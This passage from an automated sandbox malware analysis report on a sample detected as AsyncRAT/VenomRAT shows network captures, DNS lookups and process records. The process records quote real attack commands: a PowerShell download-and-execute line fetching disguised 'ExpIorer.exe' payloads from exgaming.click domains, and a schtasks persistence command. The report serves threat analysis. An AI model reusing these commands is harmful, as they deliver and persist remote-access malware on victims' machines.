                            May 26, 2024 09:49:43.828924894 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:44.641727924 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:44.659090996 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:44.665709019 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:44.671065092 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:44.956033945 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:45.001709938 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:45.090588093 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:45.099695921 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:45.104729891 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:45.107769012 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:45.112833023 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:54.796432018 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:54.802205086 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:54.802599907 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:54.807718039 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:55.112564087 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:55.155267000 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:55.261900902 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:55.263613939 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:55.270287991 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:55.270443916 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:55.279761076 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:58.531732082 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:58.536920071 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:58.543716908 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:58.548717976 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:58.842787027 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:58.891735077 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:58.973881960 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:58.975558996 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:58.980557919 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:49:58.982547998 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:49:58.989191055 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:12.077425957 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:12.082489967 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:12.082544088 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:12.087439060 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:12.389803886 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:12.439738989 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:12.521852970 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:12.524951935 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:12.529937983 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:12.531821012 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:12.537157059 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:15.405776978 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:15.410912991 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:15.410959959 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:15.416670084 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:15.892164946 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:15.936366081 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:16.027036905 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:16.028700113 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:16.034555912 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:16.034738064 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:16.039690971 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:17.889866114 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:17.895509958 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:17.895561934 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:17.900640011 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:18.202470064 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:18.248878002 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:18.333954096 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:18.339746952 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:18.344871044 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:18.347913027 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:18.352946043 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:25.436973095 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:25.442761898 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:25.442820072 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:25.447786093 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:25.751084089 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:25.795742035 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:25.881730080 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:25.883496046 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:25.888704062 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:25.888860941 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:25.893888950 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:31.358983040 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:31.364223957 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:31.364398003 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:31.369445086 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:31.674993038 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:31.717762947 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:31.805994034 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:31.808417082 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:31.815917015 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:31.815968990 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:31.822674990 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:34.827409029 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:34.832462072 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:34.832578897 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:34.837629080 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:35.140156031 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:35.187750101 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:35.280277967 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:35.284990072 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:35.290338993 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:35.290642023 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:35.295612097 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:39.640091896 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:39.645200014 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:39.645401955 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:39.650471926 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:39.955234051 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:39.968394995 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:39.973433971 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:39.973615885 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:39.979152918 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:40.074928999 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:40.076718092 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:40.081983089 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:40.082148075 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:40.087372065 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:40.176981926 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:40.217777014 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:40.314157963 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:40.315701962 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:40.320667028 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:40.320832014 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:40.325817108 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:44.186927080 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:44.191967964 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:44.192142010 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:44.198045015 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:44.501167059 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:44.547857046 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:44.635384083 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:44.639751911 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:44.644766092 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:44.650573969 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:44.655644894 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:45.374560118 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:45.379781008 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:45.379980087 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:45.384949923 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:45.687529087 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:45.733345032 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:45.822611094 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:45.824254036 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:45.829432964 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:45.829587936 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:45.834644079 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.374483109 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:47.379875898 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.380839109 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:47.385799885 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.687402964 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.733378887 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:47.780682087 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:47.785795927 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.785994053 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:47.790919065 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.843308926 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.845052004 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:47.899362087 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.899544954 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:47.908510923 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:48.077172995 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:48.123970032 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:48.209803104 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:48.211173058 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:48.216711044 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:48.216872931 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:48.222392082 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:51.968200922 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:51.973468065 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:51.973644018 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:51.979276896 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:52.264390945 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:52.311486006 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:52.397860050 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:52.401220083 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:52.406318903 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:52.411979914 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:52.416961908 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:53.311800003 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:53.316850901 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:53.318428993 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:53.323359013 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:53.797594070 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:53.842616081 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:53.929724932 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:53.931355000 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:53.936628103 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:53.936681032 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:53.942651987 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:54.280627966 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:54.285713911 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:54.285769939 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:54.290771961 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:54.592927933 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:54.642520905 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:54.727632046 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:54.736371994 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:54.741380930 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:54.741645098 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:54.746556044 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:56.124228001 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:56.129339933 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:56.129498005 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:56.134489059 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:56.424426079 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:56.467720985 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:56.557847977 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:56.558542013 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:56.563652992 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:56.563839912 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:56.568860054 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:51:09.671355009 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:51:09.676482916 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:51:09.676542997 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:51:09.681535006 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:51:09.984875917 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:51:10.030105114 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:51:10.122409105 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:51:10.123085976 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:51:10.128628969 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:51:10.128681898 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:51:10.133646965 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:51:23.218076944 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:51:23.223354101 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:51:23.223579884 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:51:23.228485107 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:51:23.515497923 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:51:23.561427116 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:51:23.649652958 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:51:23.650341988 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:51:23.655469894 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:51:23.655533075 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:51:23.660608053 CEST44494970494.156.65.172192.168.2.5

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            May 26, 2024 09:46:52.415560007 CEST6018053192.168.2.51.1.1.1
                            May 26, 2024 09:46:52.439146996 CEST53601801.1.1.1192.168.2.5
                            May 26, 2024 09:46:53.536192894 CEST6326553192.168.2.51.1.1.1
                            May 26, 2024 09:46:53.684042931 CEST53632651.1.1.1192.168.2.5
                            May 26, 2024 09:46:57.213036060 CEST5656653192.168.2.51.1.1.1
                            May 26, 2024 09:46:57.233531952 CEST53565661.1.1.1192.168.2.5
                            May 26, 2024 09:46:58.235673904 CEST6009553192.168.2.51.1.1.1
                            May 26, 2024 09:46:58.255074024 CEST53600951.1.1.1192.168.2.5

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            May 26, 2024 09:46:52.415560007 CEST192.168.2.51.1.1.10x5f11Standard query (0)xcu.exgaming.clickA (IP address)IN (0x0001)false
                            May 26, 2024 09:46:53.536192894 CEST192.168.2.51.1.1.10xf0fbStandard query (0)xcu5.exgaming.clickA (IP address)IN (0x0001)false
                            May 26, 2024 09:46:57.213036060 CEST192.168.2.51.1.1.10x6d74Standard query (0)xcu.exgaming.clickA (IP address)IN (0x0001)false
                            May 26, 2024 09:46:58.235673904 CEST192.168.2.51.1.1.10x961dStandard query (0)xcu5.exgaming.clickA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            May 26, 2024 09:46:52.439146996 CEST1.1.1.1192.168.2.50x5f11Name error (3)xcu.exgaming.clicknonenoneA (IP address)IN (0x0001)false
                            May 26, 2024 09:46:53.684042931 CEST1.1.1.1192.168.2.50xf0fbName error (3)xcu5.exgaming.clicknonenoneA (IP address)IN (0x0001)false
                            May 26, 2024 09:46:57.233531952 CEST1.1.1.1192.168.2.50x6d74Name error (3)xcu.exgaming.clicknonenoneA (IP address)IN (0x0001)false
                            May 26, 2024 09:46:58.255074024 CEST1.1.1.1192.168.2.50x961dName error (3)xcu5.exgaming.clicknonenoneA (IP address)IN (0x0001)false
                            May 26, 2024 09:46:59.459609985 CEST1.1.1.1192.168.2.50x74f1No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                            May 26, 2024 09:46:59.459609985 CEST1.1.1.1192.168.2.50x74f1No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:03:46:49
                            Start date:26/05/2024
                            Path:C:\Users\user\Desktop\ZzOTKK2V8l.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\ZzOTKK2V8l.exe"
                            Imagebase:0x600000
                            File size:76'288 bytes
                            MD5 hash:9F7B2BF836C0E9682F7F612FC60D88F9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:2
                            Start time:03:46:49
                            Start date:26/05/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Imagebase:0x7ff7bfdf0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:3
                            Start time:03:46:49
                            Start date:26/05/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:4
                            Start time:03:46:49
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:5
                            Start time:03:46:51
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:6
                            Start time:03:46:52
                            Start date:26/05/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit
                            Imagebase:0x7ff7bfdf0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:7
                            Start time:03:46:52
                            Start date:26/05/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat""
                            Imagebase:0x7ff7bfdf0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:8
                            Start time:03:46:52
                            Start date:26/05/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:9
                            Start time:03:46:52
                            Start date:26/05/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:10
                            Start time:03:46:52
                            Start date:26/05/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"'
                            Imagebase:0x7ff6e4a60000
                            File size:235'008 bytes
                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:11
                            Start time:03:46:52
                            Start date:26/05/2024
                            Path:C:\Windows\System32\timeout.exe
                            Wow64 process (32bit):false
                            Commandline:timeout 3
                            Imagebase:0x7ff79c080000
                            File size:32'768 bytes
                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:12
                            Start time:03:46:53
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:13
                            Start time:03:46:53
                            Start date:26/05/2024
                            Path:C:\Users\user\AppData\Roaming\AntiMalware.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\AppData\Roaming\AntiMalware.exe
                            Imagebase:0x810000
                            File size:76'288 bytes
                            MD5 hash:9F7B2BF836C0E9682F7F612FC60D88F9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, Author: Joe Security
                            • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, Author: ditekSHen
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 50%, ReversingLabs
                            • Detection: 55%, Virustotal, Browse
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:14
                            Start time:03:46:54
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:15
                            Start time:03:46:54
                            Start date:26/05/2024
